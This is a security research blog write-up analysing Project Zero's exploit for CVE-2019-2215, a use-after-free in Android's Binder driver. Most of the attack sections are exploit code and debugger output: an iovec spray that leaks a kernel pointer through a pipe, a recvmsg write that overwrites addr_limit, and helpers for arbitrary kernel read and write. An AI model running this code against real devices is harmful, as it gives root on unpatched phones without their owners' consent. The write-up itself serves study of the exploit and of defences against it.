Analyzing Android's CVE-2019-2215 (/dev/binder UAF)

07 November 2019

18 minute read.

Over the past few weeks, those of you who frequent the DAY[0] streams over on our Twitch may have seen me working on trying to understand the recent Android Binder Use-After-Free (UAF) published by Google's Project Zero (p0). This bug is actually not new, the issue was discovered and fixed in the mainline kernel in February 2018, however, p0 discovered many popular devices did not receive the patch downstream. Some of these devices include the Pixel 2, the Huawei P20, and Samsung Galaxy S7, S8, and S9 phones. I believe many of these devices received security patches within the last couple weeks that finally killed the bug.

After a few streams of poking around with a kernel debugger on a virtual machine (running Android-x86), and testing with a vulnerable Pixel 2, I've came to understand the exploit written by Jann Horn and Maddie Stone pretty well. Without an understanding of Binder (the binder_thread object specifically), as well as how Vectored I/O works, the exploit can be pretty confusing. It's also quite clever how they exploited this issue, so I thought it would be cool to write up how the exploit works.

We'll mostly be focusing on how an arbitrary read/write primitive is established, we won't focus on the post-exploit stuff such as disabling SELinux and enabling full root capabilities as there are quite a few write-ups out there already that cover that. Here's a brief overview of what this article will cover:

Basic overview of Binder and Vectored I/O
Vulnerability details
Leaking the kernel task struct
Establishing an arbitrary read/write (arbitrary r/w) primitive
Conclusion

Note that all code snippets will be from kernel v4.4.177, as this is the kernel I tested on personally.

Basic overview of Binder and Vectored I/O

Binder

The Binder driver is an Android-only driver which provides an easy method of Inter Process Communication (IPC), including Remote Procedure Calling (RPC). You will find this driver's source code in the mainline Linux kernel, however it is not configured for non-Android builds.

There are a few different binder device drivers that are used for different types of IPC. For communication between framework and app processes using the Android Interface Definition Language (AIDL), /dev/binder is used. For communication between framework and vendor processes / hardware using the Hardware Abstraction Layer (HAL) Interface Definition Language (HIDL), /dev/hwbinder is used. Finally, for vendors who want to use IPC between vendor processes without using HIDL, /dev/vndbinder is used. For the purposes of the exploit, we only care about the first driver, /dev/binder.

Like most IPC mechanisms in Linux, binder works through file descriptors, and you can add event polls to it using the EPOLL API.

Vectored I/O

Vectored I/O allows you to either write into a data stream using multiple buffers, or read from a data stream into multiple buffers. It's also known as "scatter/gather I/O". Vectored I/O offers a few advantages over non-vectored I/O. For one, you can write with or read to different buffers that are non-contiguous without a bunch of overhead. It's also atomic.

An example of where vectored I/O is useful is a data packet where you have a header followed by data in a contiguous block. Using vectored I/O, you can keep the header and the data in separate, non-contiguous buffers, and read to them or write using them with one system call instead of two.

How this works is you'll define an array of iovec structures which contain information about all the buffers you'd like to use for I/O. The iovec structure is relatively small, consisting only of two QWORDS (8 byte data) on 64-bit systems.

struct iovec { 		// Size: 0x10
    void *iov_base;	// 0x00
    size_t iov_len; // 0x08
}

Vulnerability details

The Binder driver has a cleanup routine you can trigger from ioctl() before actually closing the driver. If you're familiar with drivers and cleanup routines, you can likely already guess why this is can cause issues.

Let's look at the p0 report summary.

As described in the upstream commit:

“binder_poll() passes the thread->wait waitqueue that
can be slept on for work. When a thread that uses
epoll explicitly exits using BINDER_THREAD_EXIT,
the waitqueue is freed, but it is never removed
from the corresponding epoll data structure. When
the process subsequently exits, the epoll cleanup
code tries to access the waitlist, which results in
a use-after-free.

This summary is a bit misleading. The use-after-free is not on the waitqueue itself. The waitqueue is an inline struct in the binder_thread structure, the binder_thread object is what's actually UAF'd. The reason they mention the waitqueue directly in this commit summary is this issue was originally found by Google's Syzkaller fuzzer back in 2017, and the fuzzer triggered a use-after-free detected by the Kernel Address Sanitizer (KASAN) on the waitqueue's mutex.

The free

Let's take a look at the ioctl command in question, BINDER_THREAD_EXIT.

static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
	// [...]
    
    switch (cmd) {
	// [...]
	case BINDER_THREAD_EXIT:
		binder_debug(BINDER_DEBUG_THREADS, "%d:%d exit\n",
			     proc->pid, thread->pid);
		binder_free_thread(proc, thread);
		thread = NULL;
		break;
     // [...]
    }
}

// [...]

static int binder_free_thread(struct binder_proc *proc,
			      struct binder_thread *thread)
{
	struct binder_transaction *t;
	struct binder_transaction *send_reply = NULL;
	int active_transactions = 0;

	// [...]
    
	while (t) {
		active_transactions++;
		// [...]
	}
	if (send_reply)
		binder_send_failed_reply(send_reply, BR_DEAD_REPLY);
	binder_release_work(&thread->todo);
	kfree(thread);
	binder_stats_deleted(BINDER_STAT_THREAD);
	return active_transactions;
}

The critical line of code here is line 2610, kfree(thread). This is where the "free" part of the use-after-free happens.

The use (after free)

Now that we've seen where the free happens, let's try to see where the use happens. The stack trace from the KASAN report will be helpful for this.

Call Trace:
  ...
  _raw_spin_lock_irqsave+0x96/0xc0 kernel/locking/spinlock.c:159
  remove_wait_queue+0x81/0x350 kernel/sched/wait.c:50
  ep_remove_wait_queue fs/eventpoll.c:595 [inline]
  ep_unregister_pollwait.isra.7+0x18c/0x590 fs/eventpoll.c:613
  ep_free+0x13f/0x320 fs/eventpoll.c:830
  ep_eventpoll_release+0x44/0x60 fs/eventpoll.c:862
  ...

At first, it can be a bit confusing because the binder_thread object is referenced indirectly, ie. if you ctrl + f for binder_thread you won't find any occurrences. However, if we quickly look at ep_unregister_pollwait():

static void ep_unregister_pollwait(struct eventpoll *ep, struct epitem *epi)
{
	struct list_head *lsthead = &epi->pwqlist;
	struct eppoll_entry *pwq;

	while (!list_empty(lsthead)) {
		pwq = list_first_entry(lsthead, struct eppoll_entry, llink);

		list_del(&pwq->llink);
		ep_remove_wait_queue(pwq);
		kmem_cache_free(pwq_cache, pwq);
	}
}

We'll notice our free'd binder_thread is in epoll_entry's linked list, and eventually will be what pwq is.

static void ep_remove_wait_queue(struct eppoll_entry *pwq)
{
	wait_queue_head_t *whead;

	rcu_read_lock();
	/*
	 * If it is cleared by POLLFREE, it should be rcu-safe.
	 * If we read NULL we need a barrier paired with
	 * smp_store_release() in ep_poll_callback(), otherwise
	 * we rely on whead->lock.
	 */
	whead = smp_load_acquire(&pwq->whead);
	if (whead)
		remove_wait_queue(whead, &pwq->wait);
	rcu_read_unlock();
}

We can see that pwq is used in two places. One is the head of the linked list for the wait queues, whead. The other is the wait queue object itself being deleted via remove_wait_queue.

At first glance it seems both arguments to remove_wait_queue should be relatively close in memory, but the smp_load_acquire() macro needs to be considered. This macro is a memory barrier. Initially I assumed this macro just added some compiler stuff for atomic access to whead, but this was a mistake. What's not entirely obvious is smp_load_acquire() macro dereferences what's passed to it. So what I originally read as whead = &pwq->whead is actually more like whead = *(wait_queue_head_t *)&pwq->whead, or more simply, whead = pwq->whead.

Let's look at remove_wait_queue().

// WRITE-UP COMMENT: q points into stale data / the UAF object
void remove_wait_queue(wait_queue_head_t *q, wait_queue_t *wait)
{
	unsigned long flags;

	spin_lock_irqsave(&q->lock, flags);
	__remove_wait_queue(q, wait);
	spin_unlock_irqrestore(&q->lock, flags);
}

When the head of the linked list ends up being our UAF'd binder_thread, q points to stale data. This is why a KASAN crash occurs on the spinlock - it will attempt to lock the mutex on q, which is free'd memory.

On normal devices not using KASAN instrumentation, if you run the Proof-of-Concept (PoC) as-is you likely won't notice anything. It's highly likely that no crash will occur, which may lead you to (incorrectly) assume the device is not vulnerable. This is because it is very likely q still points to valid, stale heap data. However, if you perform a heap spray of 0x41's, you will trigger a CPU stall, which will cause your device to freeze.

This is because a lock is essentially just an integer that's set to either 0 (for unlocked) or 1 (for locked). Technically, if the mutex is set to any value that's not zero, it's considered locked. Because an attacker-controlled heap spray will essentially lock the mutex without going through proper channels, this mutex will be permanently locked, which will cause a deadlock and freeze the device.

It's worth noting this object resides in the kmalloc-512 cache, which is a pretty decent cache for exploitation because it's not used a lot by background processes compared to smaller caches. On kernel v4.4.177, the object is 0x190 or 400 bytes in size. Because of this size being so far from both kmalloc-256 and kmalloc-512 - it's a fair assumption that this object ends up in the kmalloc-512 cache on most if not all devices.

Leaking the kernel task struct

Weaponizing an unlink

The way this vulnerability was exploited was quite clever. The exploit takes advantage of a linked list unlink operation. This can be used on an overlapped object to corrupt it using the linked list meta-data.

Assuming the spinlock doesn't deadlock on an invalid mutex due to memory corruption, eventually the next ep_remove_wait_queue()'s &pwq->wait reference will point into our UAF'd object. Consider what remove_wait_queue(), and inevitably, __remove_wait_queue(), does on this structure:

// WRITEUP COMMENT: old points to stale data / the UAF object
static inline void
__remove_wait_queue(wait_queue_head_t *head, wait_queue_t *old)
{
	list_del(&old->task_list);
}
// ...
static inline void list_del(struct list_head *entry)
{
	__list_del(entry->prev, entry->next);
	entry->next = LIST_POISON1;
	entry->prev = LIST_POISON2;
}
// ...
static inline void __list_del(struct list_head * prev, struct list_head * next)
{
	next->prev = prev;
	WRITE_ONCE(prev->next, next);
}

The main line of importance here is next->prev = prev, This essentially is an unlink, and writes into our UAF'd object a pointer of the previous object.

This is useful because if we overlap another kernel object on top of our UAF'd object, we can weaponize this unlink to corrupt data in the overlapped object. This is used by p0 to leak kernel data. Which object is a good candidate for this attack strategy? Enter iovec.

There are a few properties of theiovec structure that makes it a really good candidate for exploitation here.

They're small (0x10 in size on 64-bit machines) and you can control all the fields with very few restrictions
You can stack them and thus control which kmalloc cache your iovec stack ends up in by how many you write with
They have a pointer (iov_base) which will be a perfect field to corrupt with the unlink.

Under normal circumstances, iov_base is checked in the kernel anywhere it's used. The kernel will first ensure that iov_base is a userland pointer before processing the request, however using the unlink primitive we just talked about, we can corrupt this pointer post-validation and overwrite it with a kernel pointer, being the prev object in the unlink process.

This means when we read from a descriptor that was written to with the corrupted iovec, we'll be reading data originating from a kernel pointer, not a userland one like it's intended. This will allow us to leak kernel data relative to the prev pointer, which contains pointers useful enough to allow for arbitrary read/write as well as code execution.

The tricky step of this process is figuring out which iovec's index lines up with the waitqueue. This is important because if we don't fake the mutex properly, the device will hang and we won't be able to have any fun on it.

Finding the offset of the waitqueue is fairly easy if you have a kernel image of the version you're targeting. By looking at a function that uses the waitqueue field of binder_thread, we can easily find the offset in the disassembly. One such function is binder_wakeup_thread_ilocked(). It calls wake_up_interruptible_sync(&thread->wait). The offset should be referenced when the address is loaded into the X0 register just before the call.

.text:0000000000C0E2B4    ADD    X0, X8, #0xA0
.text:0000000000C0E2B8    MOV    W1, #1
.text:0000000000C0E2BC    MOV    W2, #1
.text:0000000000C0E2C0    TBZ    W19, #0, loc_C0E2CC
.text:0000000000C0E2C4    BL     __wake_up_sync

On kernel v4.4.177, we can see the wait queue is 0xA0 bytes into the binder_thread object. Since iovec is 0x10 in size, this means the iovec at index 0xA in the array will line up with the wait queue.

#define BINDER_THREAD_SZ 0x190
#define IOVEC_ARRAY_SZ (BINDER_THREAD_SZ / 16)
#define WAITQUEUE_OFFSET 0xA0
#define IOVEC_INDX_FOR_WQ (WAITQUEUE_OFFSET / 16)

So how does one pass a valid iov_base address which will pass validation while also keeping the lock at 0 to prevent a deadlock? Since the lock is only a DWORD (4 bytes), and a 64-bit pointer can be passed, you just need to use mmap() to map a userland address where the lower 32-bits are 0.

dummy_page = mmap((void *)0x100000000ul, 2 * PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

// ...

struct iovec iovec_array[IOVEC_ARRAY_SZ];
memset(iovec_array, 0, sizeof(iovec_array));

iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 0x1000; /* wq->task_list->next */
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x1000;

When the exploit runs, the iovec at IOVEC_INDX_FOR_WQ will take the place of the mutex, as well as the next pointer in the linked list. The iovec at IOVEC_INDX_FOR_WQ + 1 will take the place of the prev pointer in the linked list. This means IOVEC_INDX_FOR_WQ + 1's iov_base field is the one that will be overwritten with a kernel pointer.

Let's take a look at the free'd memory in KGDB on a VM running Android-x86 before and after the unlink operation. To do this, I set a breakpoint on the call to remove_wait_queue(). The first argument will point to the free'd memory, so we'll find the pointer in the RDI register. If we examine this memory before the call, we'll see the following:

Thread 1 hit Breakpoint 11, 0xffffffff812811c2 in ep_unregister_pollwait.isra ()
gdb-peda$ x/50wx $rdi
0xffff8880959d68a0:     0x00000000      0x00000001      0x00001000      0x00000000
0xffff8880959d68b0:     0xdeadbeef      0x00000000      0x00001000      0x00000000
...

Notice the data overlaps with some iovec structures from above - for example we can see 0xdeadbeef at 0xffff88809239a6b0. Now let's take a look at the same memory after the the unlink occurs. We'll set a breakpoint at the end of ep_unregister_pollwait and examine the same memory.

Thread 1 hit Breakpoint 12, 0xffffffff812811ee in ep_unregister_pollwait.isra ()
gdb-peda$ x/50wx 0xffff8880959d68a0
0xffff8880959d68a0:     0x00000000      0x00000001      0x959d68a8      0xffff8880
0xffff8880959d68b0:     0x959d68a8      0xffff8880      0x00001000      0x00000000
...

The iov_len of the iovec at IOVEC_INDX_FOR_WQ was overwritten with a kernel pointer, and the iov_base of the iovec at IOVEC_INDX_FOR_WQ + 1 was overwritten with the same kernel pointer - thus corrupting the iovec's internal backing structure in the kernel heap!

Triggering the leak

It seems p0 decided to go with a pipe as the medium for the leak. The attack strategy is basically as follows:

Create a pipe
Trigger the free() on the binder_thread object so that the iovec structures allocated in the next step overlap it
Write the iovec structures into binder_thread's old memory via the writev() system call on the pipe
Trigger the use-after-free / unlink to corrupt the iovec structure
Call read() on the pipe, which will use the uncorrupted iovec at IOVEC_INDX_FOR_WQ to read the dummy_page data.
Call read() on the pipe again, which will use the corrupted iovec at IOVEC_INDX_FOR_WQ + 1 to read kernel data into the leak buffer.

Because we initialized two iovec's with an iov_len of 0x1000, ultimately the writev() call will write two pages of data. The first page will contain data from dummy_page, which isn't useful for exploitation. The second page will contain kernel data!

It's easier to handle the reads and writes in two separate threads. The parent thread is responsible for:

Triggering the free() on binder_thread
Writing the iovec stack to the pipe connected to the child process, which will overlap the free'd binder_thread
(waits on the child thread)
Reading the second page of leaked kernel data

The child thread is responsible for:

Corrupting the iovec by triggering the unlink via deletion of the EPOLL event
Reading the first page of dummy data

When we put this all together, here's our leak code: (note that functionally this is similar to p0's except I cleaned it up a bit and ported it to an app, hence __android_log_print())

struct epoll_event event = {.events = EPOLLIN};
struct iovec iovec_array[IOVEC_ARRAY_SZ];
char leakBuff[0x1000];
int pipefd[2];
int byteSent;
pid_t pid;

memset(iovec_array, 0, sizeof(iovec_array));

if(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event))
    exitWithError("EPOLL_CTL_ADD failed: %s", strerror(errno));

iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page; // mutex
iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 0x1000; // linked list next
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; // linked list prev
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x1000;

if(pipe(pipefd))
    exitWithError("Pipe failed: %s", strerror(errno));

if(fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000) != 0x1000)
    exitWithError("F_SETPIPE_SZ failed: %s", strerror(errno));

pid = fork();

if(pid == 0)
{
    prctl(PR_SET_PDEATHSIG, SIGKILL);
    sleep(2);

    epoll_ctl(epfd, EPOLL_CTL_DEL, fd, &event);

    if(read(pipefd[0], leakBuff, sizeof(leakBuff)) != sizeof(leakBuff))
        exitWithError("[CHILD] Read failed: %s", strerror(errno));

    close(pipefd[1]);
    _exit(0);
}

ioctl(fd, BINDER_THREAD_EXIT, NULL);
byteSent = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ);

if(byteSent != 0x2000)
    exitWithError("[PARENT] Leak failed: writev returned %d, expected 0x2000.", byteSent);

if(read(pipefd[0], leakBuff, sizeof(leakBuff)) != sizeof(leakBuff))
    exitWithError("[PARENT] Read failed: %s", strerror(errno));

__android_log_print(ANDROID_LOG_INFO, "EXPLOIT", "leak + 0xE8 = %lx\n", *(uint64_t *)(leakBuff + 0xE8));
thread_info = *(unsigned long *)(leakBuff + 0xE8);

When we run this app, we'll get something similar to the following in logcat:

com.example.binderuaf I/EXPLOIT: leak + 0xE8 = fffffffec88c5700

This pointer points to the current process thread_info struct. This structure has a very useful field we can leverage to get an arbitrary read/write primitive.

Establishing an arbitrary read/write (arbitrary r/w) primitive

Breaking the limits

So we've leaked a useful kernel pointer, now what? Let's take a look at the first few members of task_info, the object we're leaking the address of.

struct thread_info {
	unsigned long		flags;		/* low level flags */
	mm_segment_t		addr_limit;	/* address limit */
	struct task_struct	*task;		/* main task structure */
	int			preempt_count;	    /* 0 => preemptable, <0 => bug */
	int			cpu;			   /* cpu */
};

The field of interest here is addr_limit. There are some very important macros that reference this field in terms of security. Let's look at one of them - access_ok.

#define access_ok(type, addr, size)	__range_ok(addr, size)

From the comment of __range_ok() - it's essentially equivalent to (u65)addr + (u65)size <= current->addr_limit. This macro is used pretty much everywhere the kernel tries to access a user-provided pointer. It's used to ensure the pointer provided is really a userland pointer - and prevents people from trying to be clever by passing kernel pointers where the kernel expects userland pointers. See where I'm going with this? :)

Once this addr_limit is smashed, you can freely pass kernel pointers into where userland pointers are expected, and access_ok() will never fail.

Getting a controlled write primitive

We've already demonstrated we can use the unlink to read and leak kernel data - but what about modify it? Turns out we can do that too! To leak kernel data, we wrote non-contiguously into a file descriptor with a stack of iovec structures, and corrupted one of them with the unlink so that a read() call later on would leak data.

To corrupt kernel data, we go the other way. By calling recvmsg() with a stack of iovec structures and corrupting it the same way, we can force the data we wrote using write() to be copied over the sequential iovec structures to get an arbitrary write.

Let's look at the iovec stack we slot into our UAF'd object with recvmsg().

iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page; // mutex
iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 1; // linked list next
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; // linked list prev
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x8 + 2 * 0x10; // iov_len of previous, then this element and next element
iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_base = (void *)0xBEEFDEAD;
iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len = 8;

Similar to the infoleak case, the unlink corrupts the IOVEC_INDX_FOR_WQ's iovec.iov_len and IOVEC_INDEX_FOR_WQ + 1's iovec.iov_base with kernel pointers pointing directly to IOVEC_INDX_FOR_WQ's iovec.iov_len, however, this time it's splitting data we've written using these iovec structures.

Just like the infoleak case, the unlink corrupts the iov_len of the iovec at IOVEC_INDX_FOR_WQ, and the iov_base of the iovec at IOVEC_INDX_FOR_WQ + 1 with a kernel pointer. This kernel pointer isn't just pointing into some random data somewhere - if we take a look at the KGDB output again, we'll notice it points to iov_len of the iovec at IOVEC_INDX_FOR_WQ!

Once recvmsg() reaches this iovec, it will start copying the data we wrote with write() into this pointer - which allows us to write arbitrary data into the following iovec structs post-validation. This allows us to pass any pointer we want into the iov_base of the next iovec - giving us an arbitrary write. We control what gets written to this address with the tailing QWORD of the write().

If we look at the data that gets written, we can indeed see that it aligns with the backing data of iov_len at IOVEC_INDX_FOR_WQ onwards.

unsigned long second_write_chunk[] = {
    1, /* iov_len */
    0xdeadbeef, /* iov_base (already used) */
    0x8 + 2 * 0x10, /* iov_len (already used) */
    current_ptr + 0x8, /* next iov_base (addr_limit) */
    8, /* next iov_len (sizeof(addr_limit)) */
    0xfffffffffffffffe /* value to write */
};

The attack strategy is as follows:

Create a socketpair
Trigger the free() on the binder_thread object so that recvmsg()'s iovec stack overlaps binder_thread
Preemptively write 1 byte to satisfy the first iovec
Write the iovec structures into binder_thread's old memory via recvmsg()
Trigger the use-after-free / unlink to corrupt the iovec structure
Call write() on the socketpair, which will use the corrupted iovec to corrupt the next iovec to do a controlled memory corruption.

Again just like the leak, two threads are needed. The parent thread is responsible for:

Preemptively writing 1 byte of data to satisfy recvmsg()'s first iovec request.
Triggering the free() on binder_thread
Writing the iovec stack to the socket and waiting on data that matches the iovec requests via recvmsg()

The child thread is responsible for:

Corrupting the iovec by triggering the unlink via deletion of the EPOLL event
Writing the data that will corrupt the proceeding iovec structures when the parent thread's recvmsg() call continues.

Putting this all together, we end up with the following code to smash the parent process addr_limit. Again, functionally this code is the same as p0's however it's cleaned up and uses JNI functions.

#define OFFSET_OF_ADDR_LIMIT 8

struct epoll_event event = {.events = EPOLLIN};
struct iovec iovec_array[IOVEC_ARRAY_SZ];
int iovec_corruption_payload_sz;
int sockfd[2];
int byteSent;
pid_t pid;

memset(iovec_array, 0, sizeof(iovec_array));

if(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event))
    exitWithError("EPOLL_CTL_ADD failed: %s", strerror(errno));

unsigned long iovec_corruption_payload[] = {
        1,                  // IOVEC_INDX_FOR_WQ -> iov_len
        0xdeadbeef,         // IOVEC_INDX_FOR_WQ + 1 -> iov_base
        0x8 + (2 * 0x10),   // IOVEC_INDX_FOR_WQ + 1 -> iov_len
        thread_info + OFFSET_OF_ADDR_LIMIT, // Arb. Write location! IOVEC_INDEX_FOR_WQ + 2 -> iov_base
        8,                  // Arb. Write size (only need a QWORD)! IOVEC_INDEX_FOR_WQ + 2 -> iov_len
        0xfffffffffffffffe, // Arb. Write value! Smash it so we can write anywhere.
};

iovec_corruption_payload_sz = sizeof(iovec_corruption_payload);

iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page; // mutex
iovec_array[IOVEC_INDX_FOR_WQ].iov_len  = 1; // only ask for one byte since we'll only write one byte - linked list next
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; // linked list prev
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len  = 0x8 + 2 * 0x10;     // length of previous iovec + this one + the next one
iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_base = (void *)0xBEEFDEAD; // will get smashed by iovec_corruption_payload
iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len  = 8;

if(socketpair(AF_UNIX, SOCK_STREAM, 0, sockfd))
    exitWithError("Socket pair failed: %s", strerror(errno));

// Preemptively satisfy the first iovec request
if(write(sockfd[1], "X", 1) != 1)
    exitWithError("Write 1 byte failed: %s", strerror(errno));

pid = fork();

if(pid == 0)
{
    prctl(PR_SET_PDEATHSIG, SIGKILL);
    sleep(2);

    epoll_ctl(epfd, EPOLL_CTL_DEL, fd, &event);

    byteSent = write(sockfd[1], iovec_corruption_payload, iovec_corruption_payload_sz);

    if(byteSent != iovec_corruption_payload_sz)
        exitWithError("[CHILD] Write returned %d, expected %d.", byteSent, iovec_corruption_payload_sz);

    _exit(0);
}

ioctl(fd, BINDER_THREAD_EXIT, NULL);

struct msghdr msg = {
        .msg_iov = iovec_array,
        .msg_iovlen = IOVEC_ARRAY_SZ
};

recvmsg(sockfd[0], &msg, MSG_WAITALL);

Arbitrary Read/Write Helper Functions

Now that the process address limit has been smashed, arbitrary kernel read/write is as simple as a few read() and write() syscalls. By simply writing the data we want to write to a pipe with write(), and calling read() on the other end of the pipe with a kernel address, we can pipe data to an arbitrary kernel address.

Conversely, by writing data from an arbitrary kernel address to a pipe, and calling read() on the other end of the pipe, we can pipe data from an arbitrary kernel address. Boom, arbitrary read/write!

int kernel_rw_pipe[2];

//...

if(pipe(kernel_rw_pipe))
    exitWithError("Kernel R/W Pipe failed: %s", strerror(errno));

//...

void kernel_write(unsigned long kaddr, void *data, size_t len)
{
    if(len > 0x1000)
        exitWithError("Reads/writes over the size of a page results causes issues.");
    
    if(write(kernel_rw_pipe[1], data, len) != len)
        exitWithError("Failed to write data to kernel (write)!");
    
    if(read(kernel_rw_pipe[0], (void *)kaddr, len) != len)
        exitWithError("Failed to write data to kernel (read)!");
}

void kernel_read(unsigned long kaddr, void *data, size_t len)
{
    if(len > 0x1000)
        exitWithError("Reads/writes over the size of a page results causes issues.");
    
    if(write(kernel_rw_pipe[1], (void *)kaddr, len) != len)
        exitWithError("Failed to read data from kernel (write)!");
    
    if(read(kernel_rw_pipe[0], data, len) != len)
        exitWithError("Failed to read data from kernel (read)!");
}

Additional Notes

Some devices (even if they're vulnerable) may fail on the writev() in the leak call, as it'll return 0x1000 instead of the desired 0x2000. This is usually because the offset for the waitqueue is incorrect, therefore the second iovec.iov_base isn't getting smashed with a kernel pointer. This will cause the call to return 0x1000 because the second request will fail, since 0xdeadbeef is an unmapped address.

In this case, you'll have to extract the kernel image for the version you're targeting and pull the proper offsets (or potentially bruteforce it).

Conclusion

Once you have kernel read/write, it's basically game over. A root shell is a cred patch away. If you're not on a Samsung device, you can take it a step further and disable SELinux and patch the init_task credentials so every new process that launches post-exploit automatically launches with full privileges. On Samsung devices, I do not believe this is possible without extra work due to their Knox mitigation. On most other devices though, these additional patches shouldn't be an issue.

It's worth noting that p0's exploit is remarkably stable. It very rarely fails, and when it does it's usually just an error, not a kernel panic, so you just need to run the exploit again and you're good to go. This makes it an awesome temporary root method for people with OEM locked bootloaders like me.

Overall, I thought this exploit strategy by Jann Horn and Maddie Stone was pretty novel, and I definitely learned a lot breaking it down. It gave me a fresh perspective on use-after-free's, demonstrating that you're not totally out of luck if you can't get a useful primitive from the UAF'd object itself.

References / Additional Resources

Issue 1942: Android; Use-After-Free in Binder driver (Chromium Bug Tracker)

Project Zero Exploit

Syzkaller kASAN report

Bootlin Linux kernel source browser

Credit

Jann Horn and Maddie Stone for the exploit code referenced in the write-up.